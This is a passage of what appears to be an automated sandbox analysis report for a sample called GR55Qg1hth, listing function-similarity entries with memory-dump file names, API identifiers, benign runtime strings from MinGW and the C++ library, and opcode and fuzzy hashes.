                                                                    • Instruction Fuzzy Hash: D011E238F1915775E948BB636A151B65A517F4ABC9FC82431EC0DBF386DE2CE405C344
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                                                                    • String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                                                                    • API String ID: 2382646235-4003979217
                                                                    • Opcode ID: f807e9babaa5b9abb750dffb260fd96268fd1505febb0810cb3e6be92dfee7e8
                                                                    • Instruction ID: ab669b779200ef647cb6b106fd78d86a4578d6ecb2025a32419f46ef2a11bc1e
                                                                    • Opcode Fuzzy Hash: f807e9babaa5b9abb750dffb260fd96268fd1505febb0810cb3e6be92dfee7e8
                                                                    • Instruction Fuzzy Hash: 82618BB5E2DA43F1EA918B64AD062B56B90BF44B45F8C8436C94DE63A1EE7CE546C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: ca828e8494340f6ea70ebf2d121fcee27b6c141f1ad6c6af70a679c6c32c09e8
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: B181AD3160064986FA94AB669441FD972E0FBBDB80F54812DDE4D977B6DB3FC84E8700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaiseUnwindabort
                                                                    • String ID: CCG $CCG!$CCG!$CCG"
                                                                    • API String ID: 4140830120-3707373406
                                                                    • Opcode ID: d0cfdab6c2a0f7617832eba8986ab3c4ae392a9887aae9ab604b1f15f9430dbd
                                                                    • Instruction ID: 6db4d34277860d5c26134fe6bfeadd61e3b0b930ae69a18609427d24801d8106
                                                                    • Opcode Fuzzy Hash: d0cfdab6c2a0f7617832eba8986ab3c4ae392a9887aae9ab604b1f15f9430dbd
                                                                    • Instruction Fuzzy Hash: C151A232618B8296D7A08F95F8806AD37B4F789B98F584136EE8D93B58CF3CD491C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                                                                    • String ID: failed to to lock cleanup mutex
                                                                    • API String ID: 3776795807-674698732
                                                                    • Opcode ID: 193533d3492dd4cf379fe319df80661a25a0da63e728bf4553261685fad11ce2
                                                                    • Instruction ID: f27342fd61bcb3fb394f4fd2324821b8b61e6443e9f21d04b3caab7983ea8321
                                                                    • Opcode Fuzzy Hash: 193533d3492dd4cf379fe319df80661a25a0da63e728bf4553261685fad11ce2
                                                                    • Instruction Fuzzy Hash: F8213061A2DA43E1EE949F91DD561742790BF44F85F8C9835D90EE73A0EE3CE465C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: basic_string::_M_replace
                                                                    • API String ID: 3510742995-2323331477
                                                                    • Opcode ID: d9646d0238463f4a9fa5e8536c7e4f2a0cb3db8ca23900b6fa539d3a08d83e95
                                                                    • Instruction ID: 557c70538f61f29bc41b3eab79ad69b201245cd66052c63fbc410f1e88ef1247
                                                                    • Opcode Fuzzy Hash: d9646d0238463f4a9fa5e8536c7e4f2a0cb3db8ca23900b6fa539d3a08d83e95
                                                                    • Instruction Fuzzy Hash: 7971D173F09E93B1EA60DF15C6041B96A50AB41B94F9D8132DA9EAB7D4EF3CE941C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: basic_string::_M_replace
                                                                    • API String ID: 3510742995-2323331477
                                                                    • Opcode ID: c3a0455e73a6db42963485fd6a8659049703a07be9359cd056d27bd1499a8b29
                                                                    • Instruction ID: 44e0d69512dbc24c5d751cf1bfbdc0c44ef7fbf4a7249956a5474aa7180b6d33
                                                                    • Opcode Fuzzy Hash: c3a0455e73a6db42963485fd6a8659049703a07be9359cd056d27bd1499a8b29
                                                                    • Instruction Fuzzy Hash: 0861E372E0D6DBB6FA619A25C2042B96E545F46BD0F4C8132DEAEAB7C2CD2CE541C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                                                                    • API String ID: 438689982-1339558951
                                                                    • Opcode ID: 172abb4785d50f9bb8fc1aa41fe4772fd21efb9bcd329a97ec77ad43b2a038ce
                                                                    • Instruction ID: 1cd205fca66038c9792160966c66479db334131c3d973c2b9b24633e302188d9
                                                                    • Opcode Fuzzy Hash: 172abb4785d50f9bb8fc1aa41fe4772fd21efb9bcd329a97ec77ad43b2a038ce
                                                                    • Instruction Fuzzy Hash: 6651D372B0969770FA15AA6A97044BC6E506F05FD4F9C8632DEACB77C2DD2CE582C300
                                                                    APIs
                                                                    • calloc.MSVCRT ref: 00007FF65023898C
                                                                    • CreateSemaphoreA.KERNEL32 ref: 00007FF6502389CC
                                                                    • CreateSemaphoreA.KERNEL32 ref: 00007FF6502389E3
                                                                    • InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A0B
                                                                    • InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A12
                                                                    • InitializeCriticalSection.KERNEL32(?,00007FF65047F400,00000000,00007FF650237957,?,?,?,00007FF650237A85,?,?,?,?,00007FF650237C25,?,00007FF65047F400), ref: 00007FF650238A19
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                                                    • String ID:
                                                                    • API String ID: 2075313795-0
                                                                    • Opcode ID: 7e8303ed225199ebc012d561e86e84a94145ac8e4b9664a0c8037eb66d23b2a4
                                                                    • Instruction ID: 9ccbc9acfc30868606aaf262ac8915c0bbbabb611167fb5538aced076a61b459
                                                                    • Opcode Fuzzy Hash: 7e8303ed225199ebc012d561e86e84a94145ac8e4b9664a0c8037eb66d23b2a4
                                                                    • Instruction Fuzzy Hash: B121D032B15713A5FB59DB25E818BBA2A94EF48794F094436CE1D9BBC0EE3CD881C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 6bb64d160886c53119ccf66c4da09a0626b3acfccc6e44126f107c387aa1d703
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 4AE1907260874886EB60DF65D480BDDB7E4F769B98F100219EE8D57BA9CB3EC499C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                    • API String ID: 1804819252-1534286854
                                                                    • Opcode ID: e3e33f510ec569f18424812ecf334348979b1e94ec05e85f37b42736d06bb633
                                                                    • Instruction ID: cd8da59ca120bd8a5a9d9b7229cd3552e183052476989ec06c63a2e1f35dbfc8
                                                                    • Opcode Fuzzy Hash: e3e33f510ec569f18424812ecf334348979b1e94ec05e85f37b42736d06bb633
                                                                    • Instruction Fuzzy Hash: C351C072A18A43E1EB109F51E8416B97BA0FF85B98F4C8134DE4CA7395EE3CE456C740
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*.*s$%-*.*s$%.*s
                                                                    • API String ID: 0-4054516066
                                                                    • Opcode ID: 8021c32a5ab65d8367e2dd4e401afee6a582ac1b3f5481d56cebd02881bf996d
                                                                    • Instruction ID: c596ef2fd915f633422fc514ca47a5f3d47bfe683bc8c1ce9297faaa61984474
                                                                    • Opcode Fuzzy Hash: 8021c32a5ab65d8367e2dd4e401afee6a582ac1b3f5481d56cebd02881bf996d
                                                                    • Instruction Fuzzy Hash: 295179B2A1825396E7608F25C6417B9BBA1EB48F98F3CD135DA4CD7799CE3DE8008740
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*.*S$%-*.*S$%.*S
                                                                    • API String ID: 0-2115465065
                                                                    • Opcode ID: 011fee9095203b1fa813b7e73a1d16fb68cbd301c1640dc573de5faab9d2e5eb
                                                                    • Instruction ID: 44a67dc01f568a5348f420e6f19922424c3db237ec07043932b69a9c0c80b42f
                                                                    • Opcode Fuzzy Hash: 011fee9095203b1fa813b7e73a1d16fb68cbd301c1640dc573de5faab9d2e5eb
                                                                    • Instruction Fuzzy Hash: DD41E473B18643A5F7509A25D5046B8AA95EF88BA4F7CC131DE4CD7789DF3CE4418B10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$strlen
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                                    • API String ID: 3738950036-1697194757
                                                                    • Opcode ID: a672230a2770c696c69fcdeeefd17ed37b61ff551e018dffba0a57b831f28931
                                                                    • Instruction ID: 3b20589feb189b5704dd8f753199f84a555e10b8517102bbb41cc749bbcab137
                                                                    • Opcode Fuzzy Hash: a672230a2770c696c69fcdeeefd17ed37b61ff551e018dffba0a57b831f28931
                                                                    • Instruction Fuzzy Hash: 7851D6B2F05987B1FE109A26DE402E866809F15FE4F9C4231EE6CA77D5FD1CE9868300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$strlen
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                                    • API String ID: 3738950036-1697194757
                                                                    • Opcode ID: 9399586e5fb662dc3eeb57c01141c6110a813195edc18db79982ee2d928975da
                                                                    • Instruction ID: 0648e74374742967255c4dc9067f8323000cc25034af3ca4136e8b095f0f4b81
                                                                    • Opcode Fuzzy Hash: 9399586e5fb662dc3eeb57c01141c6110a813195edc18db79982ee2d928975da
                                                                    • Instruction Fuzzy Hash: 4651D8B2B09597B1FE109A26DE002F457819F05BE4F5C4235EE6CE77D6ED5CE9868300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
